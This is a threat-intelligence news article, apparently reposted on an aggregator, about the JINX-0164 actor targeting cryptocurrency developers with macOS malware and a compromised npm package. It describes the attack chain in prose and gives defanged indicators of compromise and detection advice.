RSS

New Threat Actor 'Jinx-0164' Targets Crypto Firms with Custom macOS Malware

jaybode1 pts0 comments

New Threat Actor 'JINX-0164' Targets Crypto Firms with Custom macOS Malware - CyberNetSec.io

Print

Home

NewsArticleNew Threat Actor 'JINX-0164' Targets Crypto Firms with Custom macOS Malware

Articles

JINX-0164: Financially Motivated Actor Uses Social Engineering and Custom macOS Malware in Crypto Heists

New Threat Actor 'JINX-0164' Targets Crypto Firms with Custom macOS Malware<br>HIGHMay 28, 2026<br>4m read

Threat ActorMalwareSupply Chain Attack

Related Entities<br>Threat Actors<br>JINX-0164BlueNoroff

Organizations<br>Wiz

Other<br>AUDIOFIXMiniRATLinkedIn

MITRE ATT&CK Techniques<br>T1566.002Initial Access

Phishing: Spearphishing Link<br>T1204.002Execution

User Execution: Malicious File<br>T1105Command and Control

Ingress Tool Transfer<br>T1195.002Initial Access

Compromise Software Supply Chain: Compromise Software Dependencies

Full Report

Export Markdown

Executive Summary

Security researchers at Wiz have identified a new, financially motivated threat actor, dubbed JINX-0164 , that specializes in targeting developers at cryptocurrency firms with custom macOS malware. Active since at least mid-2025, the group employs a multi-stage attack that begins with sophisticated social engineering on professional networks like LinkedIn. Victims are tricked into downloading what appears to be a meeting client, which instead deploys a custom Python-based infostealer and Remote Access Trojan (RAT) named AUDIOFIX . JINX-0164 has also demonstrated supply chain attack capabilities, previously distributing a Go-based backdoor called MiniRAT through a malicious version of a legitimate npm package. The ultimate goal is the theft of digital assets by compromising developer machines and CI/CD pipelines.

Threat Overview

Threat Actor : JINX-0164

Targeting : Developers and engineers within the cryptocurrency industry.

Malware :<br>AUDIOFIX : A Python-based macOS infostealer and RAT.

MiniRAT : A Go-based backdoor.

Attack Vectors : Social engineering, supply chain attack (compromised npm package).

Motivation : Financial gain through theft of cryptocurrency.

Technical Analysis

The attack chain used by JINX-0164 is well-orchestrated and tailored to its targets:

Reconnaissance & Luring (T1589 - Gather Victim Identity Information) : The actor identifies developers at crypto firms on LinkedIn and initiates contact with fake job offers or meeting requests.

Initial Access (T1566.002 - Phishing: Spearphishing Link) : The target is directed to a malicious domain impersonating a legitimate service (e.g., apple.driver-store[.]com).

Execution (T1204.002 - User Execution: Malicious File) : The user is tricked into downloading and running a malicious file disguised as a meeting client. This file is a bash script.

Command and Control / Payload Retrieval (T1105 - Ingress Tool Transfer) : The initial bash script downloads the main payload, the AUDIOFIX malware, from the attacker-controlled domain.

Malware Capabilities (AUDIOFIX) : The Python RAT can upload files from the victim's machine, execute arbitrary shell commands, and download additional payloads, giving the attacker full control.

Supply Chain Attack (T1195.002 - Compromise Software Supply Chain: Compromise Software Dependencies) : In a separate TTP, the actor compromised the @velora-dex/sdk npm package to distribute the MiniRAT backdoor, showing a higher level of sophistication.

While some TTPs, like targeting crypto developers and using VPN services, are similar to North Korean APT groups like BlueNoroff , researchers have not found sufficient evidence to attribute JINX-0164 to them at this time.

Impact Assessment

JINX-0164 poses a significant threat to the cryptocurrency ecosystem. By specifically targeting developers and their CI/CD infrastructure, the group aims to compromise systems at the heart of digital asset management. A successful attack could lead to:

Theft of private keys from developer machines.

Compromise of code repositories to inject malicious code into smart contracts or applications.

Large-scale theft of funds from the targeted company or its users.

Significant reputational damage and loss of trust in the compromised platform.<br>The use of custom macOS malware shows that attackers are increasingly focusing on Apple's platform as it becomes more prevalent in corporate and development environments.

IOCs — Directly from Articles

Typedomain

Valueapple.driver-store[.]com

DescriptionMalicious domain used to host malware payloads.

Typepackage_name

Value@velora-dex/sdk

DescriptionCompromised npm package used to distribute MiniRAT.

Detection & Response

Endpoint Monitoring (macOS) : Use EDR solutions with macOS support to monitor for suspicious process execution, especially Python scripts running with unusual permissions or making network connections.

Network Filtering : Block known malicious domains like apple.driver-store[.]com at the network perimeter.

Dependency Scanning : For development teams, use tools to scan software dependencies for known vulnerabilities or...

jinx malware threat macos actor custom

Related Articles

Amazon, Facebook, FBI have access to a private intelligence-sharing network

root-parent18 ptsseattle prism shield network private intelligence

Show HN: GoPeek – open links in live mini browser windows without new tabs

GeorgeWoff2518 ptsgopeek open browser links live mini

Agent Memory: An Anatomy

brgsk17 ptsmemory library user agent semantic libraries

SpaceX not the behemoth everyone thought

kaycebasques13 pts_blockquote instagram data vars text media

Naphtha Shortages Having a Growing Impact in Japan

takakaze13 ptsnaphtha packaging products shortages calbee from
terms · privacy · disclaimer · contact · policy
© 2026 NewsHub. All rights reserved.
This site is for informational purposes only. Content is aggregated from publicly available sources. We may earn commissions through affiliate links. Not affiliated with Y Combinator or Hacker News.